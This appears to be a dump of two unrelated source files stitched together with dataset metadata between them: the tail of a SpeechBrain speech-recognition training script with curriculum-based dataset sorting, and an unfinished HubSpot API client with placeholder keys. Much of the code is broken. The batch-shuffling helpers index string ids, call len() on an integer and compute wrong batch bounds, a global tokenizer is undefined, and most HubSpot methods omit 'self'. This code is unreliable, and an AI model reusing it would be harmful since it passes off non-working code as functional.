key_max_value : dict
Map from key (in data or in dynamic items) to limit, will only keep
data_point if data_point[key] <= limit
key_test : dict
Map from key (in data or in dynamic items) to func, will only keep
data_point if bool(func(data_point[key])) == True
min_weight : None, int
If not None, will only keep data_point if weight[data_point] > min_weight
max_weight : None, int
If not None, will only keep data_point if weight[data_point] < max_weight
weights : None, dict
Map from data_id to weight, these weight(s) will be used to sort the dataset.
ordering_info : str
Information to create weights based on pre-defined keys( and/or methods) and their order.
- Format : "<key1>:<order1>,<key2>:<order2>,........"
- Options for keys: `input_length`, `output_length`, `alphabetic`
- Options for order: `asc`, `desc`
- Example:
* "input_length:asc,output_length:desc" -
Sort the dataset using ``input_length`` in ascending order ,
tie is broken using ``output_length`` in descending order
Note: This is used only if `weights` is None
batch_selection : str
Information on how to order batches.
- Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted`
- Example:
* "random" -
After dataset is ordered based on `ordering_info`,
divide the dataset into batches of size `batch_size`
and order these batches randomly to create final dataset
batch_size : 8, int
Used to divide the dataset into batches. This helps in ordering the dataset at batch level.
select_n : None, int
If not None, only keep (at most) the first n filtered data_points.
The possible sorting is applied, but only on the first n data
points found. Meant for debugging.
Returns
-------
FilteredSortedDynamicItemDataset
Shares the static data, but has its own output keys and
dynamic items (initially deep copied from this, so they have the
same dynamic items available)
"""
# ordering type can be random, sorted
# keys for ordering info can be , input_length, output_length, alphabetic
dataset_ordering = self._parse_dataset_order(ordering_info)
ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"
filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test)
# order entire dataset
if ordering_type == "random":
weights = self._random_shuffled_weights(filtered_data_ids)
elif ordering_type == "sorted":
if weights == None:
# Create dataset using ordering info
weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering)
else:
pass
else:
raise NotImplementedError(
"Ordering Type must be one of random, sorted, weighted_sorted."
)
# order batchwise
if batch_selection == "contiguous":
pass
elif batch_selection == "random":
weights = self._random_shuffled_batches(weights, batch_size)
elif batch_selection == "sorted":
pass
elif batch_selection == "reverse-sorted":
weights = self._reverse_sort_batches(weights, batch_size)
else:
raise NotImplementedError(
"Ordering Type must be one of random, sorted, weighted_sorted."
)
# create Dataloader using the weights
filtered_sorted_ids = self._weighted_filtered_sorted_ids(
weights, min_weight, max_weight, select_n
)
return FilteredSortedDynamicItemDataset(
self, filtered_sorted_ids
)
def _filter_dataset(
self,
data_ids,
key_min_value={},
key_max_value={},
key_test={}
):
"""Returns a list of data ids, fulfilling the filtering criteria."""
def combined_filter(computed, key_min_value, key_max_value, key_test):
"""Checks if the data example fulfills the filtering criteria"""
for key, limit in key_min_value.items():
if computed[key] >= limit:
continue
return False
for key, limit in key_max_value.items():
if computed[key] <= limit:
continue
return False
for key, func in key_test.items():
if bool(func(computed[key])):
continue
return False
return True
temp_keys = (
set(key_min_value.keys())
| set(key_max_value.keys())
| set(key_test.keys())
)
filtered_data_ids = []
with self.output_keys_as(temp_keys):
for i, data_id in enumerate(data_ids):
data_point = self.data[data_id]
data_point["id"] = data_id
computed = self.pipeline.compute_outputs(data_point)
if combined_filter(computed, key_min_value, key_max_value, key_test):
filtered_data_ids.append(data_id)
return filtered_data_ids
def _weighted_filtered_sorted_ids(
self,
weights,
min_value=None,
max_value=None,
select_n=None,
reverse=False
):
"""Returns a list of data ids, filtered and sorted using custom weights"""
def weights_filter(weights,min_value,max_value):
"""Checks if the data example has weight within the range (`min_value`, `max_value`)"""
if min_value == None and max_value == None:
return weights
if isinstance(min_value,int):
min_value = float(min_value)
if isinstance(max_value,int):
max_value = float(max_value)
for key,value in weights.items():
if (isinstance(min_value,float) and value < min_value) or \
(isinstance(max_value,float) and value > max_value):
weights.pop(key,None)
return weights
filtered_weights = weights_filter(weights,min_value,max_value)
filtered_ids = []
for i, data_id in enumerate(weights.keys()):
if select_n is not None and len(filtered_ids) == select_n:
break
filtered_ids.append((weights[data_id],i,data_id))
filtered_sorted_ids = [
tup[2] for tup in sorted(filtered_ids, reverse=reverse)
]
return filtered_sorted_ids
def _parse_dataset_order(
self,
dataset_order=""
):
"""Takes in `ordering_info` in string as input and creates a dictionary out of it"""
ordering_info = []
orderings = dataset_order.split(",")
for order in orderings:
if order.strip() == '':
continue
column,order = order.split(":")
ordering_info.append({"key":column,"order":order})
return ordering_info
def _random_shuffle_data_ids(
self,
data_ids
):
"""Shuffle the data_ids in random order"""
return np.random.permutation(data_ids)
def _random_shuffled_weights(
self,
data_ids
):
"""Create random weightages for data_ids"""
shuffled_ids = self._random_shuffle_data_ids(data_ids)
weights = {}
for index,id in enumerate(shuffled_ids):
weights[id] = index
return weights
def _random_shuffled_batches(
self,
weights=None,
batch_size=8,
reverse=False
):
"""Randomly shuffle the dataset at batch level"""
data_ids = list(weights.keys())
for data_id in data_ids:
data_id[weights[data_id]] = data_id
data_count = len(data_ids)
batch_count = math.ceil(data_count / batch_size)
shuffled_data_ids = []
for batch in np.random.permutation(np.arange(batch_count)):
start_index = batch_size * batch
end_index = min((batch_size+1)*batch, len(data_count))
shuffled_data_ids += data_ids[start_index:end_index]
assert len(shuffled_data_ids) == len(data_ids) , "OOPS!! Batchwise shuffling gone wrong."
weights = {}
for index,data_id in enumerate(shuffled_data_ids):
weights[data_id] = index
return weights
def _reverse_sort_batches(
self,
weights=None,
batch_size=8
):
"""Reverse sort the dataset at batch level"""
data_ids = list(weights.keys())
for data_id in data_ids:
data_id[weights[data_id]] = data_id
data_count = len(data_ids)
batch_count = math.ceil(data_count / batch_size)
shuffled_data_ids = []
for batch in np.flipud(np.arange(batch_count)):
start_index = batch_size * batch
end_index = min((batch_size+1)*batch, len(data_count))
shuffled_data_ids += data_ids[start_index:end_index]
assert len(shuffled_data_ids) == len(data_ids) , "OOPS!! Batchwise sorting gone wrong."
weights = {}
for index,data_id in enumerate(shuffled_data_ids):
weights[data_id] = index
return weights
def _custom_sorted_weights(
self,
data_ids,
dataset_orderings
):
"""Create `weights` for data points using `ordering_info`"""
def compare(key1,key2):
"""
Comparing logic, as `ordering_info` can contain multiple keys
Note:
Value and its meaning
* 1 - key1 > key2
* -1 - key1 < key2
* 0 - key1 = key2
"""
for ordering in dataset_orderings:
key = ordering["key"]
order = 1 if ordering["order"] == "asc" else -1
if key == "input_length":
res = self._input_length_comparator(key1,key2)
elif key == "output_length":
res = self._output_length_comparator(key1,key2)
elif key == "alphabetic":
res = self._alphabetic_comparator(key1,key2)
res *= order
# If comparison using `key` returned data points as equal, continue
# comparing using the next key, else return the result
if res == 0:
continue
else:
return res
return res
shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare))
weights = {}
for index,id in enumerate(sorted_data_ids):
weights[id] = index
return weights
def _input_length_comparator(
self,
key1,
key2
):
"""Compare two data points based on input length"""
duration1 = float(self.data[key1]["duration"])
duration2 = float(self.data[key2]["duration"])
if duration1 > duration2:
return 1
elif duration1 < duration2:
return -1
else:
return 0
def _output_length_comparator(
self,
key1,
key2
):
"""Compare two data points based on output length"""
length1 = len(self.data[key1]["wrd"])
length2 = len(self.data[key2]["wrd"])
if length1 > length2:
return 1
elif length1 < length2:
return -1
else:
return 0
def _alphabetic_comparator(
self,
key1,
key2
):
"""Compare two data points based on alphabetic order"""
text1 = self.data[key1]["wrd"]
text2 = self.data[key2]["wrd"]
if text1 > text2:
return 1
elif text1 < text2:
return -1
else:
return 0
class ASR(sb.core.Brain):
r"""Brain class abstracts away the details of data loops.
The primary purpose of the `Brain` class is the implementation of
the ``fit()`` method, which iterates epochs and datasets for the
purpose of "fitting" a set of modules to a set of data.
In order to use the ``fit()`` method, one should sub-class the ``Brain``
class and override any methods for which the default behavior does not
match the use case. For a simple use case (e.g., training a single model
with a single dataset) the only methods that need to be overridden are:
* ``compute_forward()``
* ``compute_objectives()``
The example below illustrates how overriding these two methods is done.
For more complicated use cases, such as multiple modules that need to
be updated, the following methods can be overridden:
* ``fit_batch()``
* ``evaluate_batch()``
Arguments
---------
modules : dict of str:torch.nn.Module pairs
These modules are passed to the optimizer by default if they have
trainable parameters, and will have ``train()``/``eval()`` called on them.
opt_class : torch.optim class
A torch optimizer constructor that has takes only the list of
parameters (e.g. a lambda or partial function definition). By default,
this will be passed all modules in ``modules`` at the
beginning of the ``fit()`` method. This behavior can be changed
by overriding the ``configure_optimizers()`` method.
hparams : dict
Each key:value pair should consist of a string key and a hyperparameter
that is used within the overridden methods. These will
be accessible via an ``hparams`` attribute, using "dot" notation:
e.g., self.hparams.model(x).
run_opts : dict
A set of options to change the runtime environment, including
debug (bool)
If ``True``, this will only iterate a few batches for all
datasets, to ensure code runs without crashing.
debug_batches (int)
Number of batches to run in debug mode, Default ``2``.
debug_epochs (int)
Number of epochs to run in debug mode, Default ``2``.
If a non-positive number is passed, all epochs are run.
jit_module_keys (list of str)
List of keys in ``modules`` that should be jit compiled.
distributed_count (int)
Number of devices to run on.
distributed_backend (str)
One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
device (str)
The location for performing computations.
auto_mix_prec (bool)
If ``True``, automatic mixed-precision is used.
Activate it only with cuda.
max_grad_norm (float)
Default implementation of ``fit_batch()`` uses
``clip_grad_norm_`` with this value. Default: ``5``.
nonfinite_patience (int)
Number of times to ignore non-finite losses before stopping.
Default: ``3``.
noprogressbar (bool)
Whether to turn off progressbar when training. Default: ``False``.
ckpt_interval_minutes (float)
Amount of time between saving intra-epoch checkpoints,
in minutes, default: ``15.0``. If non-positive, these are not saved.
checkpointer : speechbrain.Checkpointer
By default, this will be used to load checkpoints, and will have the
optimizer added to continue training if interrupted.
inter_epoch_dataset_updation : bool
Whether dataset must be updated every between epochs or not. It is used in CL
which takes feedback from model and reshuffles the dataset. By, default, it is False
sortagrad: int
Number of epochs, for which curriculum based dataset be used.
It can take one of three values
* ``-1`` - Use curriculum learning for all epochs
* ``n`` - Use curriculum learning for ``n`` number of epochs
By default, it is ``-1``.
"""
def __init__(
self,
modules=None,
opt_class=None,
hparams=None,
run_opts=None,
checkpointer=None,
inter_epoch_dataset_updation=False,
sortagrad=-1
):
super().__init__(
modules=modules,
opt_class=opt_class,
hparams=hparams,
run_opts=run_opts,
checkpointer=checkpointer
)
# save attributes related to curriculum learning
self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
self.ordering = self.hparams.ordering
self.batch_selection = self.hparams.batch_selection
self.sortagrad = sortagrad
# create tensorboard summary writer
self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + "/tensorboard")
def compute_forward(self, batch, stage):
"""Forward computations from the waveform batches to the output probabilities."""
batch = batch.to(self.device)
wavs, wav_lens = batch.sig
tokens_bos, _ = batch.tokens_bos
# Add augmentation if specified
if stage == sb.Stage.TRAIN:
if hasattr(self.modules, "env_corrupt"):
wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
wavs = torch.cat([wavs, wavs_noise], dim=0)
wav_lens = torch.cat([wav_lens, wav_lens])
tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)
# compute features
feats = self.hparams.compute_features(wavs)
current_epoch = self.hparams.epoch_counter.current
feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)
if stage == sb.Stage.TRAIN:
if hasattr(self.hparams, "augmentation"):
feats = self.hparams.augmentation(feats)
# forward modules
src = self.modules.CNN(feats)
enc_out, pred = self.modules.Transformer(
src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
)
# output layer for ctc log-probabilities
logits = self.modules.ctc_lin(enc_out)
p_ctc = self.hparams.log_softmax(logits)
# output layer for seq2seq log-probabilities
pred = self.modules.seq_lin(pred)
p_seq = self.hparams.log_softmax(pred)
# Compute outputs
hyps = None
if stage == sb.Stage.TRAIN:
hyps = None
elif stage == sb.Stage.VALID:
hyps = None
current_epoch = self.hparams.epoch_counter.current
if current_epoch % self.hparams.valid_search_interval == 0:
# for the sake of efficiency, we only perform beamsearch with limited capacity
# and no LM to give user some idea of how the AM is doing
hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
elif stage == sb.Stage.TEST:
hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)
return p_ctc, p_seq, wav_lens, hyps
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss (CTC+NLL) given predictions and targets."""
(p_ctc, p_seq, wav_lens, hyps,) = predictions
ids = batch.id
tokens_eos, tokens_eos_lens = batch.tokens_eos
tokens, tokens_lens = batch.tokens
if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
tokens_eos_lens = torch.cat(
[tokens_eos_lens, tokens_eos_lens], dim=0
)
tokens = torch.cat([tokens, tokens], dim=0)
tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)
loss_seq = self.hparams.seq_cost(
p_seq, tokens_eos, length=tokens_eos_lens
)
loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
loss = (
self.hparams.ctc_weight * loss_ctc
+ (1 - self.hparams.ctc_weight) * loss_seq
)
if stage != sb.Stage.TRAIN:
current_epoch = self.hparams.epoch_counter.current
valid_search_interval = self.hparams.valid_search_interval
if current_epoch % valid_search_interval == 0 or (
stage == sb.Stage.TEST
):
# Decode token terms to words
predicted_words = [
tokenizer.decode_ids(utt_seq).split(" ") for utt_seq in hyps
]
target_words = [wrd.split(" ") for wrd in batch.wrd]
self.wer_metric.append(ids, predicted_words, target_words)
# compute the accuracy of the one-step-forward prediction
self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
return loss , loss_ctc, loss_seq
def fit_batch(self, batch):
"""Train the parameters given a single batch in input"""
# check if we need to switch optimizer
# if so change the optimizer from Adam to SGD
self.check_and_reset_optimizer()
predictions = self.compute_forward(batch, sb.Stage.TRAIN)
loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)
# normalize the loss by gradient_accumulation step
(loss / self.hparams.gradient_accumulation).backward()
if self.step % self.hparams.gradient_accumulation == 0:
# gradient clipping & early stop if loss is not fini
self.check_gradients(loss)
self.optimizer.step()
self.optimizer.zero_grad()
# anneal lr every update
self.hparams.noam_annealing(self.optimizer)
return loss.detach() , loss_ctc.detach(), loss_seq.detach()
def evaluate_batch(self, batch, stage):
"""Computations needed for validation/test batches"""
with torch.no_grad():
predictions = self.compute_forward(batch, stage=stage)
loss, _, _ = self.compute_objectives(predictions, batch, stage=stage)
return loss.detach()
def on_stage_start(self, stage, epoch):
"""Gets called at the beginning of each epoch"""
if stage != sb.Stage.TRAIN:
self.acc_metric = self.hparams.acc_computer()
self.wer_metric = self.hparams.error_rate_computer()
def on_stage_end(self, stage, stage_loss, epoch):
"""Gets called at the end of a epoch."""
# Compute/store important stats
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)
else:
stage_stats["ACC"] = self.acc_metric.summarize()
current_epoch = self.hparams.epoch_counter.current
valid_search_interval = self.hparams.valid_search_interval
if (
current_epoch % valid_search_interval == 0
or stage == sb.Stage.TEST
):
stage_stats["WER"] = self.wer_metric.summarize("error_rate")
# log stats and save checkpoint at end-of-epoch
if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
# report different epoch stages according current stage
current_epoch = self.hparams.epoch_counter.current
if current_epoch <= self.hparams.stage_one_epochs:
lr = self.hparams.noam_annealing.current_lr
steps = self.hparams.noam_annealing.n_steps
optimizer = self.optimizer.__class__.__name__
else:
lr = self.hparams.lr_sgd
steps = -1
optimizer = self.optimizer.__class__.__name__
epoch_stats = {
"epoch": epoch,
"lr": lr,
"steps": steps,
"optimizer": optimizer,
}
self.hparams.train_logger.log_stats(
stats_meta=epoch_stats,
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta={"ACC": stage_stats["ACC"], "epoch": epoch},
max_keys=["ACC"],
num_to_keep=5,
)
elif stage == sb.Stage.TEST:
self.hparams.train_logger.log_stats(
stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
test_stats=stage_stats,
)
with open(self.hparams.wer_file, "w") as w:
self.wer_metric.write_stats(w)
# save the averaged checkpoint at the end of the evaluation stage
# delete the rest of the intermediate checkpoints
# ACC is set to 1.1 so checkpointer only keeps the averaged checkpoint
self.checkpointer.save_and_keep_only(
meta={"ACC": 1.1, "epoch": epoch},
max_keys=["ACC"],
num_to_keep=1,
)
def recreate_train_dataset(self,epoch):
"""Gets called at the end of a epoch. This is used to handle , whether the dataset needs to be reshuffled at the end of epoch """
if self.inter_epoch_dataset_updation:
if self.sortagrad != -1:
# number of epochs for which curriculum must be used is defined
if self.sortagrad < epoch:
# recreate dataset using random shuffling
return
else:
# recreate dataset using preferred cl approach
return
else:
# recreate dataset using preferred cl approach
return
else:
if self.sortagrad != -1:
# number of epochs for which curriculum must be used is defined
if self.sortagrad < epoch:
# recreate dataset using random shuffling
return
else:
return
def check_and_reset_optimizer(self):
"""reset the optimizer if training enters stage 2"""
current_epoch = self.hparams.epoch_counter.current
if not hasattr(self, "switched"):
self.switched = False
if isinstance(self.optimizer, torch.optim.SGD):
self.switched = True
if self.switched is True:
return
if current_epoch > self.hparams.stage_one_epochs:
self.optimizer = self.hparams.SGD(self.modules.parameters())
if self.checkpointer is not None:
self.checkpointer.add_recoverable("optimizer", self.optimizer)
self.switched = True
def on_fit_start(self):
"""Initialize the right optimizer on the training start"""
super().on_fit_start()
# if the model is resumed from stage two, reinitialize the optimizer
current_epoch = self.hparams.epoch_counter.current
current_optimizer = self.optimizer
if current_epoch > self.hparams.stage_one_epochs:
del self.optimizer
self.optimizer = self.hparams.SGD(self.modules.parameters())
# Load latest checkpoint to resume training if interrupted
if self.checkpointer is not None:
# do not reload the weights if training is interrupted right before stage 2
group = current_optimizer.param_groups[0]
if "momentum" not in group:
return
self.checkpointer.recover_if_possible(
device=torch.device(self.device)
)
def fit(
self,
epoch_counter,
train_set,
valid_set=None,
progressbar=None,
train_loader_kwargs={},
valid_loader_kwargs={},
):
"""Iterate epochs and datasets to improve objective.
Relies on the existence of multiple functions that can (or should) be
overridden. The following methods are used and expected to have a
certain behavior:
* ``fit_batch()``
* ``evaluate_batch()``
* ``update_average()``
If the initialization was done with distributed_count > 0 and the
distributed_backend is ddp, this will generally handle multiprocess
logic, like splitting the training data into subsets for each device and
only saving a checkpoint on the main process.
Arguments
---------
epoch_counter : iterable
Each call should return an integer indicating the epoch count.
train_set : Dataset, DataLoader
A set of data to use for training. If a Dataset is given, a
DataLoader is automatically created. If a DataLoader is given, it is
used directly.
valid_set : Dataset, DataLoader
A set of data to use for validation. If a Dataset is given, a
DataLoader is automatically created. If a DataLoader is given, it is
used directly.
train_loader_kwargs : dict
Kwargs passed to `make_dataloader()` for making the train_loader
(if train_set is a Dataset, not DataLoader).
E.G. batch_size, num_workers.
DataLoader kwargs are all valid.
valid_loader_kwargs : dict
Kwargs passed to `make_dataloader()` for making the valid_loader
(if valid_set is a Dataset, not DataLoader).
E.g., batch_size, num_workers.
DataLoader kwargs are all valid.
progressbar : bool
Whether to display the progress of each epoch in a progressbar.
"""
if not (
isinstance(train_set, DataLoader)
or isinstance(train_set, LoopedLoader)
):
train_set = self.make_dataloader(
train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
)
if valid_set is not None and not (
isinstance(valid_set, DataLoader)
or isinstance(valid_set, LoopedLoader)
):
valid_set = self.make_dataloader(
valid_set,
stage=sb.Stage.VALID,
ckpt_prefix=None,
**valid_loader_kwargs,
)
self.on_fit_start()
self.train_set = train_set
total_steps = len(train_set)
if progressbar is None:
progressbar = not self.noprogressbar
# Iterate epochs
for epoch in epoch_counter:
# Training stage
self.on_stage_start(Stage.TRAIN, epoch)
self.modules.train()
# Reset nonfinite count to 0 each epoch
self.nonfinite_count = 0
if self.train_sampler is not None and hasattr(
self.train_sampler, "set_epoch"
):
self.train_sampler.set_epoch(epoch)
# Time since last intra-epoch checkpoint
last_ckpt_time = time.time()
# Only show progressbar if requested and main_process
enable = progressbar and sb.utils.distributed.if_main_process()
completed_steps = (epoch - 1) * total_steps
with tqdm(
self.train_set,
initial=self.step,
dynamic_ncols=True,
disable=not enable,
) as t:
for batch in t:
self.step += 1
global_step = completed_steps + self.step
loss, loss_ctc, loss_seq = self.fit_batch(batch)
self.avg_train_loss = self.update_average(
loss, self.avg_train_loss
)
t.set_postfix(train_loss=self.avg_train_loss)
# Write training summary to tensorboard
self.tensorboard_writer.add_scalar("Train/Loss/tot_loss", loss, global_step)
self.tensorboard_writer.add_scalar("Train/Loss/ctc_loss", loss_ctc, global_step)
self.tensorboard_writer.add_scalar("Train/Loss/att_loss", loss_seq, global_step)
# Debug mode only runs a few batches
if self.debug and self.step == self.debug_batches:
break
if (
self.checkpointer is not None
and self.ckpt_interval_minutes > 0
and time.time() - last_ckpt_time
>= self.ckpt_interval_minutes * 60.0
):
run_on_main(self._save_intra_epoch_ckpt)
last_ckpt_time = time.time()
# Run train "on_stage_end" on all processes
self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
self.avg_train_loss = 0.0
self.step = 0
# Validation stage
if valid_set is not None:
self.on_stage_start(Stage.VALID, epoch)
self.modules.eval()
avg_valid_loss = 0.0
with torch.no_grad():
for batch in tqdm(
valid_set, dynamic_ncols=True, disable=not enable
):
self.step += 1
loss = self.evaluate_batch(batch, stage=Stage.VALID)
avg_valid_loss = self.update_average(
loss, avg_valid_loss
)
# Debug mode only runs a few batches
if self.debug and self.step == self.debug_batches:
break
# Write validation summary to tensorboard
self.tensorboard_writer.add_scalar("Validation/Loss/tot_loss", avg_valid_loss, epoch)
self.tensorboard_writer.add_scalar("Validation/Accuracy/tot_acc", self.acc_metric.summarize(), epoch)
# Only run validation "on_stage_end" on main process
self.step = 0
run_on_main(
self.on_stage_end,
args=[Stage.VALID, avg_valid_loss, epoch],
)
# Debug mode only runs a few epochs
if self.debug and epoch == self.debug_epochs:
break
def on_evaluate_start(self, max_key=None, min_key=None):
"""perform checkpoint averge if needed"""
super().on_evaluate_start()
ckpts = self.checkpointer.find_checkpoints(
max_key=max_key, min_key=min_key
)
ckpt = sb.utils.checkpoints.average_checkpoints(
ckpts, recoverable_name="model", device=self.device
)
self.hparams.model.load_state_dict(ckpt, strict=True)
self.hparams.model.eval()
def dataio_prepare(hparams):
"""This function prepares the datasets to be used in the brain class.
It also defines the data processing pipeline through user-defined functions."""
data_folder = hparams["data_folder"]
# train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
# csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
# )
train_data = CurriculumOrientedDynamicDataset.from_csv(
csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
)
ordering_info = hparams["ordering"]
batch_selection = hparams["batch_selection"]
batch_size = int(hparams["batch_size"])
train_data = train_data.curriculum_based_filtered_sorted(
ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size
)
# when sorting do not shuffle in dataloader ! otherwise is pointless
hparams["train_dataloader_opts"]["shuffle"] = False
# if hparams["sorting"] == "ascending":
# # we sort training data to speed up training and get better results.
# train_data = train_data.filtered_sorted(sort_key="duration")
# # when sorting do not shuffle in dataloader ! otherwise is pointless
# hparams["train_dataloader_opts"]["shuffle"] = False
# elif hparams["sorting"] == "descending":
# train_data = train_data.filtered_sorted(
# sort_key="duration", reverse=True
# )
# # when sorting do not shuffle in dataloader ! otherwise is pointless
# hparams["train_dataloader_opts"]["shuffle"] = False
# elif hparams["sorting"] == "random":
# pass
# else:
# raise NotImplementedError(
# "sorting must be random, ascending or descending"
# )
valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["valid_csv"], replacements={"data_root": data_folder},
)
valid_data = valid_data.filtered_sorted(sort_key="duration")
# test is separate
test_datasets = {}
for csv_file in hparams["test_csv"]:
name = Path(csv_file).stem
test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=csv_file, replacements={"data_root": data_folder}
)
test_datasets[name] = test_datasets[name].filtered_sorted(
sort_key="duration"
)
datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()]
# We get the tokenizer as we need it to encode the labels when creating
# mini-batches.
tokenizer = hparams["tokenizer"]
# 2. Define audio pipeline:
@sb.utils.data_pipeline.takes("wav")
@sb.utils.data_pipeline.provides("sig")
def audio_pipeline(wav):
sig = sb.dataio.dataio.read_audio(wav)
return sig
sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)
# 3. Define text pipeline:
@sb.utils.data_pipeline.takes("wrd")
@sb.utils.data_pipeline.provides(
"wrd", "tokens_list", "tokens_bos", "tokens_eos", "tokens"
)
def text_pipeline(wrd):
yield wrd
tokens_list = tokenizer.encode_as_ids(wrd)
yield tokens_list
tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
yield tokens_bos
tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
yield tokens_eos
tokens = torch.LongTensor(tokens_list)
yield tokens
sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)
# 4. Set output:
sb.dataio.dataset.set_output_keys(
datasets, ["id", "sig", "wrd", "tokens_bos", "tokens_eos", "tokens","duration"],
)
return train_data, valid_data, test_datasets, tokenizer
if __name__ == "__main__":
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# If distributed_launch=True then
# create ddp_group with the right communication protocol
sb.utils.distributed.ddp_init_group(run_opts)
# 1. # Dataset prep (parsing Librispeech)
from librispeech_prepare import prepare_librispeech # noqa
# Create experiment directory
sb.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# multi-gpu (ddp) save data preparation
run_on_main(
prepare_librispeech,
kwargs={
"data_folder": hparams["data_folder"],
"tr_splits": hparams["train_splits"],
"dev_splits": hparams["dev_splits"],
"te_splits": hparams["test_splits"],
"save_folder": hparams["data_folder"],
"merge_lst": hparams["train_splits"],
"merge_name": hparams["train_csv"],
"skip_prep": hparams["skip_prep"],
},
)
# here we create the datasets objects as well as tokenization and encoding
train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams)
# # We download the pretrained LM from HuggingFace (or elsewhere depending on
# # the path given in the YAML file). The tokenizer is loaded at the same time.
run_on_main(hparams["pretrainer"].collect_files)
hparams["pretrainer"].load_collected(device=run_opts["device"])
# Trainer initialization
asr_brain = ASR(
modules=hparams["modules"],
opt_class=hparams["Adam"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
# adding objects to trainer:
asr_brain.tokenizer = hparams["tokenizer"]
# Training
asr_brain.fit(
asr_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["train_dataloader_opts"],
valid_loader_kwargs=hparams["valid_dataloader_opts"],
)
# Testing
for k in test_datasets.keys(): # keys are test_clean, test_other etc
asr_brain.hparams.wer_file = os.path.join(
hparams["output_folder"], "wer_{}.txt".format(k)
)
with torch.no_grad():
asr_brain.evaluate(
test_datasets[k],
max_key="ACC",
test_loader_kwargs=hparams["test_dataloader_opts"],
)
# # print(train_data)
# train_set = make_dataloader(
# valid_data ,
# stage = Stage.TRAIN,
# **hparams["valid_dataloader_opts"]
# )
# with tqdm(
# train_set,
# initial=0,
# dynamic_ncols=True,
# disable=False,
# ) as t:
# cnt = 0
# for batch in t:
# # print(batch.duration)
# # print(batch.wrd)
# # if cnt == 5:
# # exit()
# cnt += 1
| 2.28125 | 2 |
app/services/hubspot.py | PrudhviRaj5/boilerplate-sanic | 0 | 12796226 | import requests
import ujson
# from b2b_app.config import CONFIG
class Hubspot:
def __init__(self, hub_id, refresh_token):
self.hub_id = hub_id
self.refresh_token = refresh_token
self.access_token = self.get_access_token(refresh_token)
self._lists_url = 'https://api.hubapi.com/contacts/v1/lists'
pass
def get_access_token(self, refresh_token):
pass
def update_access_token():
pass
##### ACCOUNT APIS #####
def get_account_by_id():
pass
# read all companies
def get_all_accounts():
pass
# create company in hubspot
def create_account():
pass
# update company
def update_account():
#
pass
def add_contact_to_account():
pass
def get_associated_deals_for_account():
pass
##### CONTACT APIS #####
def get_contact_by_id():
pass
# read all companies
def get_all_contacts():
url = self._lists_url + 'all/contacts/all'
querystring = {
'vid-offset': '0',
'count': '10',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
# create contact
def create_contact():
pass
# update contact
def update_contact():
pass
# deleting contact
def delete_contact():
pass
def get_associated_deals_for_contact():
pass
##### LISTS APIS #####
def get_all_static_lists():
url = self._lists_url
querystring = {
'offset': '0',
'count': '10',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def get_all_dynamic_lists():
url = self._lists_url + '/dynamic'
querystring = {
'offset': '0',
'count': '10',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def get_list_by_id(self, list_id):
url = self._lists_url + '/' + list_id
querystring = {
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def create_static_list(self, list_name):
url = self._lists_url
querystring = {
'hapikey': '<KEY>',
}
payload = ujson.dumps({
'name': list_name,
'dynamic': False,
'portalId': 5225356,
'filters': [],
})
response = requests.request(
'POST',
url,
data=payload,
params=querystring
)
print(response.text)
def create_dynamic_list():
url = self._lists_url
querystring = {
'hapikey': '<KEY>',
}
payload = ujson.dumps({
'name': list_name,
'dynamic': True,
'portalId': 5225356,
'filters': [],
})
response = requests.request(
'POST',
url,
